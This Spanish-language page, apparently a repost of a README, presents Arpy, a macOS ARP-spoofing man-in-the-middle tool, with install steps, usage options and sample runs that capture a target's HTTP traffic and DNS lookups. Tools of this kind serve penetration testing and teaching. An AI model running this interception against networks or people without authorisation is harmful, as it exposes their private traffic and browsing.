Arpy - Herramienta Mac OSX ARP Spoof (MiTM)

Arpy es una herramienta MiTM de suplantación de ARP fácil de usar para Mac.

Proporciona 3 funciones específicas:

  • Paquetes de olfateo
  • Dominios visitados
  • Dominios visitados con Gource

  • Python 2.7
  • Gource
  • Scapy
  • libdnet

    Instalación:

    • Gource:
    brew install gource

    • Scapy:
    pip install scapy

    • libdnet:
    $ git clone https://github.com/dugsong/libdnet.git
    $ cd libdnet
    $ ./configure && make && make install
    cd python
    python setup.py install
    

    Uso:

    ivanvza:~/ > sudo arpy
         _____
        |  _  |___ ___ _ _
        |     |  _| . | | |
        |__|__|_| |  _|_  |
        MiTM Tool |_| |___|
        v3.15 -@viljoenivan
    
    Usage: arpy -t <Target IP> -g <Gateway IP> -i <Interface>
    
    ARP MiTM Tool
    
    Options:
      -h, --help            show this help message and exit
      -t TARGET, --target=TARGET
                            The Target IP
      -g GATEWAY, --gateway=GATEWAY
                            The Gateway
      -i INTERFACE, --interface=INTERFACE
                            Interface to use
      --tcp                 Filters out only tcp traffic
      --udp                 Filters out only udp traffic
      -d D_PORT, --destination_port=D_PORT
                            Filter for a destination port
      -s S_PORT, --source_port=S_PORT
                            Filter for a source port
      --sniff               Sniff all passing data
      --sniff-dns           Sniff only searched domains
      --sniff-dns-gource    Output target's DNS searches in gource format
      -v                    Verbose scapy packet print
    

    Huele el paquete:

    Este es el rastreador de paquetes, le permite ver el tráfico de su objetivo.

    ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff
         _____
        |  _  |___ ___ _ _
        |     |  _| . | | |
        |__|__|_| |  _|_  |
        MiTM Tool |_| |___|
        v3.15 -@viljoenivan
    
    
      [Info] Starting Sniffer...
    
    [Info] Enabling IP Forwarding...
    [Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3))
    
    [Info] Found the following (IP layer): 192.168.1.3 -> 46.101.34.90
    GET / HTTP/1.1
    User-Agent: curl/7.37.1
    Host: ivanvza.ninja
    Accept: */*
    
    
    
    [Info] Found the following (IP layer): 46.101.34.90 -> 192.168.1.3
    HTTP/1.1 200 OK
    Vary: Accept-Encoding
    Content-Type: text/html
    Accept-Ranges: bytes
    ETag: "2719538271"
    Last-Modified: Thu, 30 Apr 2015 08:25:15 GMT
    Content-Length: 3213
    Date: Fri, 29 May 2015 20:15:06 GMT
    Server: Microsoft IIS
    
    <html>
         <title>><></title>
        <body>
            <pre style="line-height: 1.25; white-space: pre;">
                      SORRY            /
                                      /
                  This page does     /
               ]   not exist yet.    [    ,'|
               ]                     [   /  |
               ]___               ___[ ,'   |
               ]  ]             /[  [ |:   |
               ]  ]            / [  [ |:   |
               ]  ]  ]         [  [  [ |:   |
               ]  ]  ]__     __[  [  [ |:   |
               ]  ]  ] ] _ /[ [  [  [ |:   |
               ]  ]  ] ] (#) [ [  [  [ :===='
               ]  ]  ]_].nHn.[_[  [  [
               ]  ]  ]  HHHHH. [  [  [
               ]  ] /   `HH("N   [  [
               ]__]/     HHH  "  [__[
               ]         NNN         [
               ]         N/"         [
               ]         N H         [
              /          N            
             /           q,            
            /                           
            </pre>
            <h3 id="list"><h3>
        </body>
    <script>
    
    // NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23
    var RTCPeerConnection = /*window.RTCPeerConnection ||

    Sniff de DNS:

    Esta función le permite ver los nombres de dominio que su objetivo está solicitando actualmente.

    ivanvza:~/ > sudo arpy -t 192.168.1.4 -g 192.168.1.1 -i en0 --sniff-dns
         _____
        |  _  |___ ___ _ _
        |     |  _| . | | |
        |__|__|_| |  _|_  |
        MiTM Tool |_| |___|
             - @viljoenivan
    
    
      [Info] Starting DNS Sniffer...
    
    [Info] Enabling IP Forwarding...
    [Info] Done...
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: www.youtube.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s2.googleusercontent.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: google.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s.ytimg.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: fonts.gstatic.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: yt3.ggpht.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: i.ytimg.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing.google.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.

    Sniff de DNS con Gource:

    Esta función es más o menos la misma que la anterior, sin embargo, proporciona la funcionalidad de pasar por Gource para obtener una transmisión en vivo de lo que está viendo su objetivo.

    ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff-dns-gource
    [INFO] For a live gource feed run this command in parallel with this one:
    
    tail -f /tmp/36847parsed_nmap | tee /dev/stderr | gource -log-format custom -a 1 --file-idle-time 0 -
    
    [Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3) and dst port 53)
    

    ¿Ha sido útil? post

    Contenido relacionado

    Deja una respuesta

    Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

    Subir